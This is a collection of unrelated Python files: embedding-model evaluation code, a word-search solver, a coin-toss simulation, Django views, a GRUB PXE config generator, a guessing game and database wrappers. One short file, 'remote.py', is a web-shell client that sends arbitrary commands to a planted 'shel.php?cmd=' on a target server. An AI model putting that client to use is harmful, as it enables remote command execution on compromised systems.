do_time_consuming_checks=do_time_consuming_checks,
)
if evaluated_once: # slice_size = None
return batch_size, None
# We need to try slicing, if the evaluation for the batch_size search never succeeded
slice_size, evaluated_once = self._param_size_search(
key='slice_size',
# Since the batch_size search with size 1, i.e. one tuple ((h, r) or (r, t)) scored on all entities,
# must have failed to start slice_size search, we start with trying half the entities.
start_value=ceil(model.num_entities / 2),
model=model,
mapped_triples=mapped_triples,
device=device,
use_tqdm=use_tqdm,
restrict_entities_to=restrict_entities_to,
do_time_consuming_checks=False,
)
if not evaluated_once:
raise MemoryError("The current model can't be trained on this hardware with these parameters.")
return batch_size, slice_size
def _param_size_search(
self,
key: str,
start_value: Optional[int],
model: Model,
mapped_triples: MappedTriples,
device: Optional[torch.device] = None,
use_tqdm: bool = False,
restrict_entities_to: Optional[torch.LongTensor] = None,
do_time_consuming_checks: bool = True,
) -> Tuple[int, bool]:
values_dict = {}
maximum_triples = mapped_triples.shape[0]
if key == 'batch_size':
if start_value is None:
start_value = 256
if start_value > maximum_triples:
start_value = maximum_triples
values_dict[key] = start_value
values_dict['slice_size'] = None
elif key == 'slice_size':
if start_value is None:
start_value = ceil(model.num_entities / 2)
self._check_slicing_availability(model, batch_size=1)
values_dict[key] = start_value
values_dict['batch_size'] = 1
else:
raise AttributeError(f'The parameter {key} is unknown.')
reached_max = False
evaluated_once = False
logger.info(f'Starting {key} search for evaluation now...')
while True:
logger.debug(f'Trying {key}={values_dict[key]}')
try:
# The cache of the previous run has to be freed to allow accurate memory availability estimates
gc.collect()
torch.cuda.empty_cache()
evaluate(
model=model,
mapped_triples=mapped_triples,
evaluators=self,
only_size_probing=True,
device=device,
squeeze=True,
use_tqdm=use_tqdm,
restrict_entities_to=restrict_entities_to,
do_time_consuming_checks=do_time_consuming_checks,
batch_size=values_dict.get('batch_size'),
slice_size=values_dict.get('slice_size'),
)
evaluated_once = True
except RuntimeError as runtime_error:
# Due to the caused OOM Runtime Error, the failed model has to be cleared to avoid memory leakage
for p in model.parameters():
if p.grad is not None:
del p.grad # free some memory
# The cache of the previous run has to be freed to allow accurate memory availability estimates
gc.collect()
torch.cuda.empty_cache()
if (
not is_cudnn_error(runtime_error)
and not is_cuda_oom_error(runtime_error)
and not is_nonzero_larger_than_maxint_error(runtime_error)
):
raise runtime_error
if values_dict[key] == 1:
logger.debug(
f"Even {key} {values_dict[key]} does not fit into your memory with these parameters.",
)
break
# values_dict[key] will always be an int at this point
values_dict[key] //= 2 # type: ignore
reached_max = True
if evaluated_once:
logger.info(f'Concluded {key} search with batch_size={values_dict[key]}.')
break
else:
logger.debug(f'The {key} {values_dict[key]} was too big, trying less now')
else:
# The cache of the previous run has to be freed to allow accurate memory availability estimates
gc.collect()
torch.cuda.empty_cache()
if not reached_max and values_dict['batch_size'] < maximum_triples:
values_dict[key] *= 2 # type: ignore
else:
logger.info(f'Concluded {key} search with batch_size={values_dict[key]}.')
break
return cast(Tuple[int, bool], (values_dict[key], evaluated_once))
@staticmethod
def _check_slicing_availability(model: Model, batch_size: int) -> None:
# Test if slicing is implemented for the required functions of this model
if model.triples_factory.create_inverse_triples:
if not model.can_slice_t:
raise MemoryError(f"The current model can't be evaluated on this hardware with these parameters, as "
f"evaluation batch_size={batch_size} is too big and slicing is not implemented for "
f"this model yet.")
elif not model.can_slice_t or not model.can_slice_h:
raise MemoryError(f"The current model can't be evaluated on this hardware with these parameters, as "
f"evaluation batch_size={batch_size} is too big and slicing is not implemented for this "
f"model yet.")
def create_sparse_positive_filter_(
hrt_batch: MappedTriples,
all_pos_triples: torch.LongTensor,
relation_filter: torch.BoolTensor = None,
filter_col: int = 0,
) -> Tuple[torch.LongTensor, torch.BoolTensor]:
"""Compute indices of all positives.
For simplicity, only the head-side is described, i.e. filter_col=0. The tail-side is processed alike.
For each (h, r, t) triple in the batch, the entity identifiers are computed such that (h', r, t) exists in all
positive triples.
:param hrt_batch: shape: (batch_size, 3)
A batch of triples.
:param all_pos_triples: shape: (num_positive_triples, 3)
All positive triples to base the filtering on.
:param relation_filter: shape: (batch_size, num_positive_triples)
A boolean mask R[i, j] which is True iff the j-th positive triple contains the same relation as the i-th triple
in the batch.
:param filter_col:
The column along which to filter. Allowed are {0, 2}, where 0 corresponds to filtering head-based and 2
corresponds to filtering tail-based.
:return:
- positives, shape: (2, m)
The indices of positives in format [(batch_index, entity_id)].
- the relation filter for re-usage.
"""
if filter_col not in {0, 2}:
raise NotImplementedError(
'This code has only been written for updating head (filter_col=0) or '
f'tail (filter_col=2) mask, but filter_col={filter_col} was given.',
)
if relation_filter is None:
relations = hrt_batch[:, 1:2]
relation_filter = (all_pos_triples[:, 1:2]).view(1, -1) == relations
# Split batch
other_col = 2 - filter_col
entities = hrt_batch[:, other_col:other_col + 1]
entity_filter_test = (all_pos_triples[:, other_col:other_col + 1]).view(1, -1) == entities
filter_batch = (entity_filter_test & relation_filter).nonzero(as_tuple=False)
filter_batch[:, 1] = all_pos_triples[:, filter_col:filter_col + 1].view(1, -1)[:, filter_batch[:, 1]]
return filter_batch, relation_filter
def create_dense_positive_mask_(
zero_tensor: torch.FloatTensor,
filter_batch: torch.LongTensor,
) -> torch.FloatTensor:
"""Construct dense positive mask.
:param zero_tensor: shape: (batch_size, num_entities)
A tensor of zeros of suitable shape.
:param filter_batch: shape: (m, 2)
The indices of all positives in format (batch_index, entity_id)
:return:
The dense positive mask with x[b, i] = 1 iff (b, i) in filter_batch.
"""
zero_tensor[filter_batch[:, 0], filter_batch[:, 1]] = 1
return zero_tensor
def filter_scores_(
scores: torch.FloatTensor,
filter_batch: torch.LongTensor,
) -> torch.FloatTensor:
"""Filter scores by setting true scores to NaN.
:param scores: shape: (batch_size, num_entities)
The scores for all corrupted triples (including the currently considered true triple). Are modified *in-place*.
:param filter_batch: (m, 2)
The indices of all positives.
:return:
A reference to the scores, which have been updated in-place.
"""
# Bind shape
batch_size, num_entities = scores.shape
# Set all filtered triples to NaN to ensure their exclusion in subsequent calculations
scores[filter_batch[:, 0], filter_batch[:, 1]] = float('nan')
# Warn if all entities will be filtered
# (scores != scores) yields true for all NaN instances (IEEE 754), thus allowing to count the filtered triples.
if ((scores != scores).sum(dim=1) == num_entities).any():
logger.warning(
"User selected filtered metric computation, but all corrupted triples exists also as positive "
"triples",
)
return scores
def evaluate(
model: Model,
mapped_triples: MappedTriples,
evaluators: Union[Evaluator, Collection[Evaluator]],
only_size_probing: bool = False,
batch_size: Optional[int] = None,
slice_size: Optional[int] = None,
device: Optional[torch.device] = None,
squeeze: bool = True,
use_tqdm: bool = True,
tqdm_kwargs: Optional[Mapping[str, str]] = None,
restrict_entities_to: Optional[torch.LongTensor] = None,
do_time_consuming_checks: bool = True,
) -> Union[MetricResults, List[MetricResults]]:
"""Evaluate metrics for model on mapped triples.
The model is used to predict scores for all tails and all heads for each triple. Subsequently, each abstract
evaluator is applied to the scores, also receiving the batch itself (e.g. to compute entity-specific metrics).
Thereby, the (potentially) expensive score computation against all entities is done only once. The metric evaluators
are expected to maintain their own internal buffers. They are returned after running the evaluation, and should
offer a possibility to extract some final metrics.
:param model:
The model to evaluate.
:param mapped_triples:
The triples on which to evaluate. The mapped triples should never contain inverse triples - these are created by
the model class on the fly.
:param evaluators:
An evaluator or a list of evaluators working on batches of triples and corresponding scores.
:param only_size_probing:
The evaluation is only performed for two batches to test the memory footprint, especially on GPUs.
:param batch_size: >0
A positive integer used as batch size. Generally chosen as large as possible. Defaults to 1 if None.
:param slice_size: >0
The divisor for the scoring function when using slicing.
:param device:
The device on which the evaluation shall be run. If None is given, use the model's device.
:param squeeze:
Return a single instance of :class:`MetricResults` if only one evaluator was given.
:param use_tqdm:
Should a progress bar be displayed?
:param restrict_entities_to:
Optionally restrict the evaluation to the given entity IDs. This may be useful if one is only interested in a
part of the entities, e.g. due to type constraints, but wants to train on all available data. For ranking the
entities, we still compute all scores for all possible replacement entities to avoid irregular access patterns
which might decrease performance, but the scores with afterwards be filtered to only keep those of interest.
If provided, we assume that the triples are already filtered, such that it only contains the entities of
interest.
:param do_time_consuming_checks:
Whether to perform some time consuming checks on the provided arguments. Currently, this encompasses:
- If restrict_entities_to is not None, check whether the triples have been filtered.
Disabling this option can accelerate the method.
"""
if isinstance(evaluators, Evaluator): # upgrade a single evaluator to a list
evaluators = [evaluators]
start = timeit.default_timer()
# verify that the triples have been filtered
if restrict_entities_to is not None and do_time_consuming_checks:
present_entity_ids = get_entities(triples=mapped_triples)
unwanted = present_entity_ids.difference(restrict_entities_to.tolist())
if len(unwanted) > 0:
raise ValueError(f'mapped_triples contains IDs of entities which are not contained in restrict_entities_to:'
f'{unwanted}. This will invalidate the evaluation results.')
# Send to device
if device is not None:
model = model.to(device)
device = model.device
# Ensure evaluation mode
model.eval()
# Split evaluators into those which need unfiltered results, and those which require filtered ones
filtered_evaluators = list(filter(lambda e: e.filtered, evaluators))
unfiltered_evaluators = list(filter(lambda e: not e.filtered, evaluators))
# Check whether we need to be prepared for filtering
filtering_necessary = len(filtered_evaluators) > 0
# Check whether an evaluator needs access to the masks
# This can only be an unfiltered evaluator.
positive_masks_required = any(e.requires_positive_mask for e in unfiltered_evaluators)
# Prepare for result filtering
if filtering_necessary or positive_masks_required:
all_pos_triples = torch.cat([model.triples_factory.mapped_triples, mapped_triples], dim=0)
all_pos_triples = all_pos_triples.to(device=device)
else:
all_pos_triples = None
# Send tensors to device
mapped_triples = mapped_triples.to(device=device)
# Prepare batches
if batch_size is None:
# This should be a reasonable default size that works on most setups while being faster than batch_size=1
batch_size = 32
logger.info(f"No evaluation batch_size provided. Setting batch_size to '{batch_size}'.")
batches = cast(Iterable[np.ndarray], split_list_in_batches_iter(input_list=mapped_triples, batch_size=batch_size))
# Show progressbar
num_triples = mapped_triples.shape[0]
# Flag to check when to quit the size probing
evaluated_once = False
# Disable gradient tracking
_tqdm_kwargs = dict(
desc=f'Evaluating on {model.device}',
total=num_triples,
unit='triple',
unit_scale=True,
# Choosing no progress bar (use_tqdm=False) would still show the initial progress bar without disable=True
disable=not use_tqdm,
)
if tqdm_kwargs:
_tqdm_kwargs.update(tqdm_kwargs)
with optional_context_manager(use_tqdm, tqdm(**_tqdm_kwargs)) as progress_bar, torch.no_grad():
# batch-wise processing
for batch in batches:
batch_size = batch.shape[0]
relation_filter = None
for column in (0, 2):
relation_filter = _evaluate_batch(
batch=batch,
model=model,
column=column,
filtered_evaluators=filtered_evaluators,
unfiltered_evaluators=unfiltered_evaluators,
slice_size=slice_size,
all_pos_triples=all_pos_triples,
relation_filter=relation_filter,
restrict_entities_to=restrict_entities_to,
positive_masks_required=positive_masks_required,
filtering_necessary=filtering_necessary,
)
# If we only probe sizes we do not need more than one batch
if only_size_probing and evaluated_once:
break
evaluated_once = True
if use_tqdm:
progress_bar.update(batch_size)
# Finalize
results = [evaluator.finalize() for evaluator in evaluators]
stop = timeit.default_timer()
if only_size_probing:
logger.debug("Evaluation took %.2fs seconds", stop - start)
else:
logger.info("Evaluation took %.2fs seconds", stop - start)
if squeeze and len(results) == 1:
return results[0]
return results
def _evaluate_batch(
batch: MappedTriples,
model: Model,
column: int,
filtered_evaluators: Collection[Evaluator],
unfiltered_evaluators: Collection[Evaluator],
slice_size: Optional[int],
all_pos_triples: Optional[MappedTriples],
relation_filter: Optional[torch.BoolTensor],
restrict_entities_to: Optional[torch.LongTensor],
positive_masks_required: bool,
filtering_necessary: bool,
) -> torch.BoolTensor:
"""
Evaluate batch for all head predictions(column=0), or all tail predictions (column=2).
:param batch: shape: (batch_size, 3)
The batch of currently evaluated triples.
:param model:
The model to evaluate.
:param column:
The column which to evaluate. Either 0 for head prediction, or 2 for tail prediction.
:param filtered_evaluators:
The evaluators which work on filtered scores.
:param unfiltered_evaluators:
The evaluators which work on unfiltered scores.
:param slice_size:
An optional slice size for computing the scores.
:param all_pos_triples:
All positive triples (required if filtering is necessary).
:param relation_filter:
The relation filter. Can be re-used.
:param restrict_entities_to:
Restriction to evaluate only for these entities.
:param positive_masks_required:
Whether dense positive masks are required (by any unfiltered evaluator).
:param filtering_necessary:
Whether filtering is necessary.
:return:
The relation filter, which can be re-used for the same batch.
"""
if column not in {0, 2}:
raise ValueError(f'column must be either 0 or 2, but is column={column}')
# Predict scores once
if column == 2: # tail scores
batch_scores_of_corrupted = model.predict_t(batch[:, 0:2], slice_size=slice_size)
else:
batch_scores_of_corrupted = model.predict_h(batch[:, 1:3], slice_size=slice_size)
# Select scores of true
batch_scores_of_true = batch_scores_of_corrupted[
torch.arange(0, batch.shape[0]),
batch[:, column],
]
# Create positive filter for all corrupted
if filtering_necessary or positive_masks_required:
# Needs all positive triples
if all_pos_triples is None:
raise ValueError('If filtering_necessary of positive_masks_required is True, all_pos_triples has to be '
'provided, but is None.')
# Create filter
positive_filter, relation_filter = create_sparse_positive_filter_(
hrt_batch=batch,
all_pos_triples=all_pos_triples,
relation_filter=relation_filter,
filter_col=column,
)
# Create a positive mask with the size of the scores from the positive filter
if positive_masks_required:
positive_mask = create_dense_positive_mask_(
zero_tensor=torch.zeros_like(batch_scores_of_corrupted),
filter_batch=positive_filter,
)
else:
positive_mask = None
# Restrict to entities of interest
if restrict_entities_to is not None:
batch_scores_of_corrupted_ = batch_scores_of_corrupted[:, restrict_entities_to]
positive_mask = positive_mask[:, restrict_entities_to]
else:
batch_scores_of_corrupted_ = batch_scores_of_corrupted
# Evaluate metrics on these *unfiltered* scores
for unfiltered_evaluator in unfiltered_evaluators:
if column == 2: # tail scores
process = unfiltered_evaluator.process_tail_scores_
else:
process = unfiltered_evaluator.process_head_scores_
process(
hrt_batch=batch,
true_scores=batch_scores_of_true[:, None],
scores=batch_scores_of_corrupted_,
dense_positive_mask=positive_mask,
)
# Filter
if filtering_necessary:
batch_filtered_scores_of_corrupted = filter_scores_(
scores=batch_scores_of_corrupted,
filter_batch=positive_filter,
)
# The scores for the true triples have to be rewritten to the scores tensor
batch_filtered_scores_of_corrupted[
torch.arange(0, batch.shape[0]),
batch[:, column],
] = batch_scores_of_true
# Restrict to entities of interest
if restrict_entities_to is not None:
batch_filtered_scores_of_corrupted = batch_filtered_scores_of_corrupted[:, restrict_entities_to]
# Evaluate metrics on these *filtered* scores
for filtered_evaluator in filtered_evaluators:
if column == 2: # tail scores
process = filtered_evaluator.process_tail_scores_
else:
process = filtered_evaluator.process_head_scores_
process(
hrt_batch=batch,
true_scores=batch_scores_of_true[:, None],
scores=batch_filtered_scores_of_corrupted,
)
return relation_filter
|
#!/usr/bin/env python3
class Solution(object):
def exist(self, board, word):
"""
:type board: List[List[str]]
:type word: str
:rtype: bool
"""
if not board: return False
for i in range(len(board)):
for j in range(len(board[0])):
if self.dfs(board, i, j, word): return True
return False
def dfs(self, board, i, j, word):
if len(word) == 0: return True
if i < 0 or i >= len(board) or j < 0 or j >= len(board[0]) or word[0] != board[i][j]: return False
tmp = board[i][j]
board[i][j] = "#"
res = self.dfs(board, i + 1, j, word[1:]) or self.dfs(board, i - 1, j, word[1:]) \
or self.dfs(board, i, j + 1, word[1:]) or self.dfs(board, i, j - 1, word[1:])
board[i][j] = tmp
return res
if __name__ == "__main__":
s = Solution()
board = [["A", "B", "C", "E"], ["S", "F", "C", "S"], ["A", "D", "E", "E"]]
word = "ABCCED"
result = s.exist(board, word)
print(result)
|
#Courtney Peterson
#CSCI2244: Randomness and Computation
from __future__ import print_function, division
import numpy as np # this is a universal shorthand for numpy
import matplotlib.pyplot as plt
def run_lengths(n, p):
""" This returns a list of the run lengths in n tosses of a coin whose heads probability is p.
Arguments:
n--Number of tosses (a positive int),
p--The probability of observing heads for any given toss (float between 0 and 1).
"""
numpy_array = np.random.choice(['T', 'F'], p=[p, 1 - p], size=n) #returns a numpy array of T and Fs, with T= heads and F=tail
run_lengthslist = []
count = 1
#print(numpy_array) #don't necessarily need, but just shows sequence of tosses
for i in range(0, len(numpy_array)-1):
if numpy_array[i] == numpy_array[i + 1]:
count +=1
else:
run_lengthslist.append(count)
count = 1
run_lengthslist.append(count)
return run_lengthslist
def draw_hist_longest_run(n, p, trial_num, cumulative=False):
"""Draws a histogram of the maximum run length in n tosses of
a coin with a heads probability p.
Arguments:
n--Number of tosses (a positive int),
p--The probability of observing heads for any given toss
(float between 0 and 1),
trial_num--Number of trials used to create the histogram
(positive int),
cumulative--A flag to switch the histogram between cumulative
and non-cumulative modes (bool).
"""
total_runs_max = []
for i in range(0, trial_num):
x = run_lengths(n, p)
y = max(x)
total_runs_max.append(y)
# "bins" for the histogram (bar chart). We get a column chart of the number
# of elements in between each successive pair of bin markers.
bins = np.arange(-.5, n + 1.5)
fig = plt.figure()
# setting zorder to 3 brings the histogram to the front
plt.hist(total_runs_max, bins, color="g", cumulative=cumulative, zorder=3)
plt.xlim(-1, 50)
plt.title(('Max run length of {:d} tosses '.format(n) + 'of a coin {:d} times '.format(trial_num) +
'with heads probability of {:}'.format(p)))
plt.xlabel('Number of Heads')
plt.ylabel('Number of Occurences')
plt.grid(axis='both', zorder = 1) # push the grid lines to the back
fig.savefig('Fig1.png')
return None
def draw_hist_num_runs(n, p, trial_num, cumulative=False): ##need to FIX!
"""Draws a histogram of the number of runs in n tosses of a
coin with a heads probability p.
Arguments:
n--Number of tosses (a positive int),
p--The probability of observing heads for any given toss
(float between 0 and 1),
trial_num--Number of trials used to create the histogram
(positive int),
cumulative--A flag to switch the histogram between cumulative
and non-cumulative modes (bool).
"""
# n rows of k columns of coin tosses
total_runs_len = []
for i in range(0, trial_num):
x = run_lengths(n, p)
y = len(x)
total_runs_len.append(y)
# "bins" for the histogram (bar chart). We get a column chart of the number
# of elements in between each successive pair of bin markers.
bins = np.arange(-.5, n + 1.5)
fig = plt.figure()
# setting zorder to 3 brings the histogram to the front
plt.hist(total_runs_len, bins, color="g", cumulative=cumulative, zorder=3)
plt.xlim(-1, 50)
plt.title(('{:d} tosses of '.format(n) + '{:d} coins with '.format(trial_num) +
'success probability {:}'.format(p)))
plt.xlabel('Number of Runs')
plt.ylabel('Number of Occurences')
plt.grid(axis='both', zorder = 1) # push the grid lines to the back
fig.savefig('Fig2.png')
return None
draw_hist_longest_run(300, .5, 5000, cumulative=False)
plt.show()
#draw_hist_num_runs(50, .5, 5000, cumulative=False)
#draw_hist_num_runs(50, .2, 5000, cumulative=False)
#plt.show()
|
from urllib2 import HTTPError
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseNotFound
from django.views.decorators.csrf import csrf_exempt
from django.conf import settings
from myproject.gcm import beats
from myproject.gcm.models import Device, Song, Cluster, Event
from myproject.gcm.api import send_gcm_message, parse_gcm_result
def parse_song(file_name, recreate=True):
s = Song(song_name=file_name)
s.save(recreate=recreate)
@csrf_exempt
def device(request):
"""
Register device
Args:
database_id - previous reg_id
reg_id - reg id from android app
cluster_id - cluster_id of device
"""
database_id = request.POST.get('database_id', None)
if not database_id:
return HttpResponseBadRequest()
device, created = Device.objects.get_or_create(reg_id=database_id)
if not created:
device.reg_id = request.POST.get('reg_id')
device.is_active = True
device.cluster_id = request.POST.get('cluster_id')
device.save()
return HttpResponse()
@csrf_exempt
def delete(request):
"""
Unregister device
Args:
database_id - id of device to be deleted
"""
database_id = request.POST.get('database_id', None)
if not database_id:
return HttpResponseNotFound()
try:
device = Device.objects.get(reg_id=database_id)
device.delete()
except:
return HttpResponseBadRequest()
return HttpResponse()
@csrf_exempt
def cluster(request, debug=False):
"""
Assign a new cluster to the device that sent this request.
Assumption: There is only 1 event in the database. Later on match
the cluster to an event.
"""
event = Event.objects.get(event_name='CPSC434 Presentation')
song = event.current_song
song_data = song.get_beats()
try:
device = Device.objects.get(reg_id=request.POST.get('database_id', 0))
except:
return HttpResponseNotFound()
newid = str(Cluster.objects.count()) # Make a more intelligent scheme later
ncluster = Cluster(cluster_id=newid, event=event)
device.cluster_id = newid
device.save(force_update=True)
data = sorted(song_data.iteritems(), key=lambda x: x[1][1], reverse=True) # Again a more intelligent scheme later
freq = int(data[int(newid)%len(data)][1][0])
if debug:
print 'Data:', data
print 'Freq:', freq
msg = {'frequency': freq, 'cluster': newid}
if debug:
print 'Sending message:', msg
ncluster.frequency = freq
ncluster.save(msg, debug)
return HttpResponse()
|
#! /usr/bin/env python2
# -*- coding: utf-8 -*-
#
from string import Template
import os
import urllib2
class Menuentry(object):
def __init__(self,menuentry,path,vmlinuz, options, initrd, chroot="/home/pxe/tftp/grub"):
self.menuentry = menuentry
self.path = path
self.vmlinuz = vmlinuz
self.options = options
self.initrd = initrd
self.chroot = chroot
if menuentry is None or vmlinuz is None or initrd is None:
raise
if options is None:
self.options=""
def __str__(self):
tempT = """
menuentry "$menuentry" {
linux $vmlinuz $options
initrd $initrd
}
"""
tempTemplate = Template(tempT)
return tempTemplate.safe_substitute(menuentry=self.menuentry, vmlinuz=os.path.join(self.path,self.vmlinuz), options=self.options, initrd=os.path.join(self.path,self.initrd))
class deepin_dailylive_next_menuentry(Menuentry):
def __init__(self):
self.menuentry="Deepin Dailylive Next"
self.path="/live-boot/deepin-next/caser"
self.vmlinuz="vmlinuz"
self.options="boot=casper netboot=nfs nfsroot=10.0.0.6:/nfsroot/deepin-next/desktop/current/amd64/ quiet splash locale=zh_CN"
self.initrd="initrd.lz"
super(deepin_dailylive_next_menuentry,self).__init__(self.menuentry, self.path,self.vmlinuz, self.options, self.initrd)
self.valicate()
def _get_timestamp(self, url):
import re
import time
try:
page = urllib2.urlopen(url)
except:
return None
if page.getcode() != 200:
return None
timestr=None
for i in page.readlines():
m = re.match(r"<a.*>vmlinuz.*</a>\s+(.*\s\S*)\s+.+", i)
if m:
timestr=m.group(1).strip()
break
if timestr is None:
return None
timestruct=time.strptime(timestr, "%d-%b-%Y %H:%M")
timestamp=time.strftime("(%Y%m%d %H:%M)",timestruct)
return timestamp
def download(self, url, savepath):
try:
r=urllib2.urlopen(url)
f=open(savepath,'wb')
f.write(r.read())
f.close()
except:
raise
def valicate(self, url="http://cdimage/nfsroot/deepin-next/desktop/current/amd64/casper"):
timestamp=self._get_timestamp(url)
if not timestamp:
return False
_real_root_path = os.path.join(self.chroot, self.path.lstrip('/'))
if not os.path.exists(_real_root_path):
print "Make dirs %s" % _real_root_path
os.makedirs(_real_root_path)
if os.path.exists(os.path.join(_real_root_path, self.vmlinuz)):
os.unlink(os.path.join(_real_root_path,self.vmlinuz))
if os.path.exists(os.path.join(_real_root_path, self.initrd)):
os.unlink(os.path.join(_real_root_path,self.initrd))
try:
self.download(url+'/vmlinuz', os.path.join(_real_root_path, self.vmlinuz))
self.download(url+'/initrd.lz', os.path.join(_real_root_path, self.initrd))
except:
return False
self.menuentry+=" %s" % timestamp
def __str__(self):
tempT = """
menuentry "$menuentry" {
linux $vmlinuz $options
initrd $initrd
}
menuentry "LiveInstaller $menuentry" {
linux $vmlinuz $options livecd-installer
initrd $initrd
}
"""
tempTemplate = Template(tempT)
return tempTemplate.safe_substitute(menuentry=self.menuentry, vmlinuz=os.path.join(self.path,self.vmlinuz), options=self.options, initrd=os.path.join(self.path,self.initrd))
class Submenu():
def __init__(self,name):
self.name = name
self.menuentry = []
def get_menuentry(self):
return self.menuentry
def append(self,menuentry):
self.menuentry.append(menuentry)
def __str__(self):
strings = 'submenu "%s" {' % self.name
for menuentry in self.get_menuentry():
strings+=str(menuentry)
strings+="}"
return strings
class GrubCfg():
def __init__(self):
self.entry = []
def get_entry(self):
return self.entry
def append(self,entry):
self.entry.append(entry)
def __str__(self):
strings=""
for entry in self.get_entry():
strings+=str(entry)
return strings
grubcfg=GrubCfg()
menus=Submenu('Deepin live Next')
daily_live_next=deepin_dailylive_next_menuentry()
menus.append(daily_live_next)
grubcfg.append(menus)
print grubcfg
|
from django.http import HttpResponseNotAllowed, HttpResponse, HttpResponseForbidden
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404
from django.db.models import get_model
from poster.encode import multipart_encode, MultipartParam
from poster.streaminghttp import register_openers
from metadatadb.proxy import proxyRequest, can_edit
from metadatadb.config import metadataServerUrl
import urllib2
Resource = get_model('registry', 'Resource')
def allFiles(req, resourceId):
allowed = [ 'GET', 'POST' ]
if req.method not in allowed:
return HttpResponseNotAllowed(allowed)
def getFiles(req, resourceId):
res = get_object_or_404(Resource, metadata_id=resourceId)
if res.can_view(req.user):
kwargs = {
'path': '/metadata/record/' + resourceId + '/file/',
'method': req.method
}
return proxyRequest(**kwargs)
else:
return HttpResponseForbidden('You cannot view this resource.')
@login_required # Registry tracking required?
def newFile(req, resourceId):
if not can_edit(req.user, resourceId):
return HttpResponseForbidden('You do not have permission to edit this resource')
register_openers()
theFile = req.FILES['upload-file']
kwargs = {
'name': 'upload-file',
'filename': theFile.name,
'filetype': theFile.content_type,
'filesize': theFile.size,
'fileobj': theFile
}
params = MultipartParam(**kwargs)
datagen, headers = multipart_encode([ params ])
url = '/'.join([ metadataServerUrl, 'metadata/record', resourceId, 'file/' ])
request = urllib2.Request(url, datagen, headers)
response = urllib2.urlopen(request)
clientResponse = HttpResponse()
clientResponse.status_code = response.code
clientResponse['Location'] = response.info()['Location']
return clientResponse
if req.method == 'GET': return getFiles(req, resourceId)
if req.method == 'POST': return newFile(req, resourceId) |
import time
import requests
import sys
if len(sys.argv) < 2:
print "\n[!] Use: remote.py https://target.com/shel.php\n"
sys.exit()
i = sys.argv[1]
print "~ Exploit To "+i
print ""
time.sleep(3)
while True:
try:
c = raw_input("sxc@"+i+":~$ ")
r = requests.get(i+"?cmd="+c)
print r.text
except Exception:
print "cek url"
break
|
"""
随机指定一个1到100之间的随机数,
给出一个数:大了,显示"太大了";小了,显示"太小了"
直到猜对为止,猜对之后显示猜了几次,并问还要继续猜吗?
"""
import random
import sys
while True:
unkown_number = random.randint(1, 100)
guess_count = 0
guess_flg = True
while guess_flg:
print("please input a number:")
input_str = input()
guess_count +=1
try:
input_number = int(input_str)
except Exception as e:
print(e)
print("please input again:")
else:
if input_number == unkown_number:
guess_flg = False
print("you got it, the number is {}. guess_count:{}".format(unkown_number,guess_count))
print("if you want to play again , please input yes.")
again_input = input()
if again_input == "yes":
pass
else:
sys.exit(1)
if input_number > unkown_number:
print("太大了")
else:
print("太小了")
|
# Implements db interfaces
# Mostly contains code that are used internally only
import pymysql as MySQLdb
import pandas as pd
class SeqDB(object):
"""
Motifmap SeqDB interface
"""
def __init__(self, dbp, ref):
import motifmap.motifmapcore as motifmapcore
import numpy as np
print """Please note that this module requires a correct \
working directory as MotifMap uses relative paths only.\
If you see C++ exception check your paths."""
self.db = motifmapcore.seqdb()
self.db.load(dbp, ref)
return
def get_seq(self, chrom, start, end):
if type (chrom)!= str or type(start)!=int or type(end)!=int:
raise TypeError("Query value type error")
return self.db.get(chrom, start,end)
def moods_score(self,seq,mat, bg, thr):
if len (mat[0])==4:
mat = list(np.array(mat).transpose())
MATRIX = motifmapcore.DoubleMat()
for row in mat:
d=motifmapcore.DoubleVec()
for ele in row:
d.append(ele)
MATRIX.append(d)
BACKGROUND = motifmapcore.DoubleVec()
for ele in bg:
BACKGROUND.append(ele)
scores = self.db.moods_scan(seq, MATRIX, BACKGROUND, thr)
return scores
def moods_score_naive(self, seq, mat, thr):
if len (mat[0])==4:
mat = list(np.array(mat).transpose())
MATRIX = motifmapcore.DoubleMat()
for row in mat:
d=motifmapcore.DoubleVec()
for ele in row:
d.append(ele)
MATRIX.append(d)
BACKGROUND = motifmapcore.DoubleVec()
for ele in bg:
BACKGROUND.append(ele)
scores = self.db.moods_naive_scan(seq, MATRIX, thr)
return scores
class ListDB(object):
"""
A simple interface to delimiter based lists
"""
def __init__(self, fname, tname=None, kind="simple", sep="\n", col=None, delim="\t"):
"""
1, delimiter separated lists. Only contains ids, delimiters and white spaces
2, multiple columns db with no header, specify which column to take as id
3, a table with a header, specify header name
"""
if type(fname)==list or type(fname)==set:
self.data = sorted(list(fname))
self.data_unique=set(fname)
if not tname:
self.tname="CustomSet"
else:
self.tname=tname
return
if not tname:
self.tname=fname
else:
self.tname=tname
if kind not in ["simple","multiple","table"]:
raise NotImplemented("This kind of list is not supported")
if kind == "multiple":
if type(col)!=int:
raise TypeError("Please provide correct col number")
lines = [i.strip() for i in open(fname).read().split(sep) if i.strip()!=""]
self.data = [i.split(delim)[col] if len(i.split(delim))> col else "" for i in lines]
self.data = [i.strip() for i in self.data if i.strip()!=""]
elif kind == "table":
if type(col)!=str:
raise TypeError("Please provide correct col name")
import pandas as pd
df = pd.read_csv(fname, sep=sep)
self.data = df[col].values
else:
self.data = [i.strip() for i in open(fname).read().split(sep) if i.strip()!=""]
print "Loaded a list with ", len(self.data),"elements"
self.data_unique=set(self.data)
return
def cross(self, entry):
if entry in self.data_unique:
return True
else:
return False
def cross_mult (self, list_entry):
return sorted(list(self.data_unique& set(list_entry)))
class TableDB(object):
"""
A database to query csv like tables
"""
def __init__(self, fname, sep="\t", index=None):
import pandas as pd
if index:
self.df = pd.read_csv(fname, sep=sep, index= index)
else:
self.df = pd.read_csv(fname, sep=sep)
def cross_mult(self, col, list_in):
return self.df[self.df[col].isin(list_in)]
class MySQLDB(object):
"""
Interface to MySQL databases
"""
def __init__(self,db,
MYSQL_HOST="",
MYSQL_PORT="",
MYSQL_USER="",
MYSQL_PASS=""
):
print "TRYING TO CONNECT TO DB",db
self.dbname=db
self.host = MYSQL_HOST
self.port=MYSQL_PORT
self.user=MYSQL_USER
self.pwd=MYSQL_PASS
self.db = MySQLdb.connect(host=self.host,
user=self.user,
passwd=self.pwd,
db=db,
port=self.port)
self.cur = self.db.cursor()
def connect(self):
self.db = MySQLdb.connect(host=self.host,
user=self.user,
passwd=self.pwd,
db=self.dbname,
port=self.port)
def query(self, sql):
try:
cursor = self.db.cursor()
cursor.execute(sql)
